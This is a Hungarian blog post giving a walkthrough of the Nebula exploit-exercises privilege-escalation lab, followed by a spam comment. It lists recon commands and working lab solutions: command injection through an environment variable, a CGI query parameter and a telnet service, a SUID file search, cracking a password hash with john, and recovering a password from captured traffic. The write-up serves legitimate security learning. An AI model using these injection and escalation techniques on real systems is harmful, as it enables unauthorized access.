2013. november 30., szombat

Privilégium eszkaláció

Első lépés feldertés.
Who am I?
id
Where am I?
pwd
What is in there?
ls -al
Which system is this?
uname -a
cat /etc/*release*

----

Forrás:

http://insidetrust.blogspot.hu/2011/04/quick-guide-to-linux-privilege.html

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

http://www.rebootuser.com/?p=1623

https://www.netspi.com/blog/entryid/112/windows-privilege-escalation-part-1-local-administrator-privileges

Automated checkers:

http://pentestmonkey.net/tools/audit/unix-privesc-check

http://www.rebootuser.com/?p=1758

Feladványok:

http://exploit-exercises.com/nebula

level00

find / -perm -4000 -type f 2>/dev/null
/bin/.../flag00

level01

Itt nem egészen értettem, hogy mit kell csinálni így megnéztem egy megoldást - utána már egyszerűbb volt...

http://www.mattandreko.com/2011/12/02/exploit-exercises-nebula-01/

level02

cd /home/flag02
USER="a && /bin/bash && "
./flag02
geflag

level03

vi /home/level03/test
#!/bin/bash
getflag > /tmp/out

cp /home/level03/test writeable.d

... (wait 1 minute)
cat /tmp/out

level04

cd /home/flag04
ln -s /home/flag04/token /home/level04/t
./flag04 /home/level04/t
06508b5e-8909-4f38-b630-fdb148a848a2

level05

cd /home/flag05
ls -al
ls -al .backup
cp .backup/b* /home/level05
cd /home/level05
tar xvzf backup-19072011.tgz
ssh flag05@192.168.56.101 -i .ssh/id_rsa
getflag

level06

ls -al /home/flag06
grep flag06 /etc/passwd

edit a.pas
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

john a.pas
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 15687  trying: 123456 - marley

exit
nebula login:flag06
Password: hello
getflag

level07
cd /home/flag07
more thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101

PING 192.168.56.101 (192.168.56.101) 56(84) bytes of data.
64 bytes from 192.168.56.101: icmp_req=1 ttl=64 time=0.020 ms
64 bytes from 192.168.56.101: icmp_req=2 ttl=64 time=0.050 ms
64 bytes from 192.168.56.101: icmp_req=3 ttl=64 time=0.056 ms

--- 192.168.56.101 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.020/0.042/0.056/0.015 ms

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20ls%20-al

total 10
drwxr-x--- 2 flag07 level07  102 Nov 20  2011 .
drwxr-xr-x 1 root   root     260 Aug 27  2012 ..
-rw-r--r-- 1 flag07 flag07   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag07 flag07  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag07 flag07   675 May 18  2011 .profile
-rwxr-xr-x 1 root   root     368 Nov 20  2011 index.cgi
-rw-r--r-- 1 root   root    3719 Nov 20  2011 thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20id

uid=992(flag07) gid=992(flag07) groups=992(flag07)

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20getflag

You have successfully executed getflag on a target account

level08

cd /home/flag08
ls -al
cp capture.pcap /home/level08
cd /home/level08
scp capture.pcap user@192.168.56.102:.

wireshark capture.pcap

Follow Tcp stream

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b.....B.
..............................1.......!.."......"......!..........."........".."................
.....................

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)


..wwwbugs login: l.le.ev.ve.el.l8.8
..

Password: backdoor...00Rm8.ate
.

..

Login incorrect

wwwbugs login:



backdoor...00Rm8.ate

000000B9  62                                               b
000000BA  61                                               a
000000BB  63                                               c
000000BC  6b                                               k
000000BD  64                                               d
000000BE  6f                                               o
000000BF  6f                                               o
000000C0  72                                               r
000000C1  7f                                               .
000000C2  7f                                               .
000000C3  7f                                               .
000000C4  30                                               0
000000C5  30                                               0
000000C6  52                                               R
000000C7  6d                                               m
000000C8  38                                               8
000000C9  7f                                               .
000000CA  61                                               a
000000CB  74                                               t
000000CC  65                                               e
000000CD  0d                                               .

7f = delete

backd00Rmate

nebula login: flag08
Password: backd00Rmate

getflag

level09

Ez a feladat meghaladta a jelenlegi tudásomat :)

http://www.mattandreko.com/2011/12/10/exploit-exercises-nebula-09/

level10

ls -al
more .viminfo
strings x

Ez egy nehéz feladvány volt, de mivel két lépésben hozzájutottam a szükséges kódhoz nem fárasztottam vele magam (persze megnéztem, hogy mi a példa igazi megoldása, de végülis ha megy könnyebben, akkor nem vesződöm a nehezebb úttal.)

http://www.mattandreko.com/2011/12/11/exploit-exercises-nebula-10/

http://www.pedramhayati.com/2012/02/01/nebula-level10-solution/

level11

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level12

telnet 127.0.0.1 5001
| ls -al > /tmp/a

cat /tmp/a

telnet 127.0.0.1 5001
| getflag > /tmp/b

cat /tmp/b

level13

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level14

cd /home/flag14
cat token
./flag14
aaaaaaaaaaaaaaaaaaaa
abcdefghijklmnopqrst

vi /home/level14/decode.pl

#!/usr/bin/perl

while (my $line = <STDIN>) {
 chomp($line);
 $len = length($line);
 for ($i = 0; $i < $len; $i++) {
  $y = substr($line,$i,1);
  $x = ord($y);
  print chr($x-$i);
  }
 }

cat token | perl /home/level14/decode.pl
8457c118-887c-4e40-a5a6-33a25353165

level15-level19

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

Ezekbe most nem volt kedvem belemenni. Meg különben is meghaladták a jelenlegi felkészültségi szintemet.
Jöhetnek a Privilege Escalation feladványok..... Most egy kicsit beleásom ebbe a részbe magam.

1 megjegyzés:

  1. If you need your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you got to watch this video
    right away...

    (VIDEO) Want your ex CRAWLING back to you...?

    VálaszTörlés